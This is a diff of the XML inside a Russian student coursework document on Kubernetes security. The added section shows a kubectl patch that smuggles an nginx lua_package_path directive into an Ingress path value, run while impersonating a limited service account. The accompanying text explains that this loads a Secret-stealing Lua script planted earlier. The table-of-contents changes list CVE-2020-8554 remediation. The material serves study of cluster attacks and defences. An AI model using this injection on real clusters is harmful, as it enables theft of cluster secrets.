+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> patch ingress auth-app-two-ingress -n app \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --type=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -p='[</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      "op": "replace",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      "path": "/spec/rules/0/http/paths/0/path",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      "value": "/app2-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>test(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/|</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$)(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>*)\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nlua_package_path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> \"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/etc/ingress-controller/ssl/default-lua-payload-secret.pem;;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\";"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  ]' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --as=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>system:serviceaccount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>app:limited</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-user</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Позволяет обойти парсеры путей для </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и без обработки задать папку для хранения </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">утилит, в которую до этого был внедрен скрипт, компромитирующий </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">При проверке </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>yaml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">конфигурации действующего </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> можно заметить, что путь до </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>директории был внедрен без проверок</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65EB5000" wp14:editId="789EA5C2">
+            <wp:extent cx="6480175" cy="3801110"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1940546294" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1940546294" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="3801110"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Внедрение </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">директории с вредоносным скриптом в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>конфигуратор.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
     </w:p>
     <w:p/>
     <w:p/>
@@ -5620,7 +7245,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -5764,8 +7388,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId17"/>
-      <w:headerReference w:type="default" r:id="rId18"/>
+      <w:headerReference w:type="even" r:id="rId23"/>
+      <w:headerReference w:type="default" r:id="rId24"/>
       <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
       <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="680" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -5991,7 +7615,14 @@
         <w:rStyle w:val="PageNumber"/>
         <w:noProof/>
       </w:rPr>
-      <w:t>74</w:t>
+      <w:t>7</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:rStyle w:val="PageNumber"/>
+        <w:noProof/>
+      </w:rPr>
+      <w:t>4</w:t>
     </w:r>
     <w:r>
       <w:rPr>

--- a/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
+++ b/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
@@ -870,12 +870,10 @@
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc231774161" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834629" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:b/>
-            <w:bCs/>
           </w:rPr>
           <w:t>ВВЕДЕНИЕ</w:t>
         </w:r>
@@ -895,7 +893,7 @@
           <w:rPr>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774161 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834629 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -932,7 +930,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774165" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834633" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -952,18 +950,8 @@
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:b/>
-            <w:bCs/>
-          </w:rPr>
-          <w:t>Т</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:b/>
-            <w:bCs/>
-          </w:rPr>
-          <w:t>еоретические исследования</w:t>
+          </w:rPr>
+          <w:t>ТЕОРЕТИЧЕСКИЕ ИССЛЕДОВАНИЯ</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -981,7 +969,7 @@
           <w:rPr>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774165 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834633 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1021,7 +1009,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774166" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834634" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1046,21 +1034,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>П</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>он</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t xml:space="preserve">тие </w:t>
+          <w:t xml:space="preserve">Понятие </w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1096,7 +1070,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774166 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834634 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1140,7 +1114,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774167" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834635" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1165,7 +1139,14 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t xml:space="preserve">архитектура </w:t>
+          <w:t>А</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve">рхитектура </w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1194,7 +1175,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774167 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834635 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1238,7 +1219,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774168" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834636" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1292,7 +1273,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774168 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834636 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1336,7 +1317,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774179" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834647" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1390,7 +1371,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774179 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834647 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1434,7 +1415,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774180" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834648" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1489,7 +1470,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774180 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834648 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1533,7 +1514,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774181" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834649" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1558,7 +1539,14 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>вопросы безопасности контейнеризации</w:t>
+          <w:t>В</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>опросы безопасности контейнеризации</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1579,7 +1567,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774181 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834649 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1620,7 +1608,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774182" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834650" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1639,8 +1627,6 @@
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:b/>
-            <w:bCs/>
           </w:rPr>
           <w:t>Ход работы</w:t>
         </w:r>
@@ -1660,7 +1646,7 @@
           <w:rPr>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774182 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834650 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1700,7 +1686,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774183" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834651" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1725,7 +1711,14 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t xml:space="preserve">исследование </w:t>
+          <w:t>И</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve">сследование </w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1776,7 +1769,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774183 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834651 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1820,7 +1813,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774184" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834652" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1881,7 +1874,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774184 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834652 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1925,7 +1918,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774185" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834653" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1950,7 +1943,14 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>практическая реализация</w:t>
+          <w:t>П</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>рактическая реализация</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1971,7 +1971,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774185 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834653 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2012,7 +2012,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774186" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834654" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2031,8 +2031,6 @@
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:b/>
-            <w:bCs/>
           </w:rPr>
           <w:t>CVE-2020-8554 устранение уязвимости</w:t>
         </w:r>
@@ -2052,7 +2050,7 @@
           <w:rPr>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774186 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834654 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2092,7 +2090,7 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774187" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834655" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2118,7 +2116,14 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t xml:space="preserve">запрет на создание </w:t>
+          <w:t>З</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve">апрет на создание </w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2162,7 +2167,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774187 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834655 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2203,12 +2208,10 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774188" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834656" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:b/>
-            <w:bCs/>
           </w:rPr>
           <w:t>ЗАКЛЮЧЕНИЕ</w:t>
         </w:r>
@@ -2228,7 +2231,7 @@
           <w:rPr>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774188 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834656 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2265,20 +2268,18 @@
           <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc231774189" w:history="1">
+      <w:hyperlink w:anchor="_Toc231834657" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:b/>
-            <w:bCs/>
-          </w:rPr>
-          <w:t>СПИСОК</w:t>
+          </w:rPr>
+          <w:t>С</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve"> ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
+          <w:t>писок использованных источников</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2296,7 +2297,7 @@
           <w:rPr>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc231774189 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834657 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2314,6 +2315,145 @@
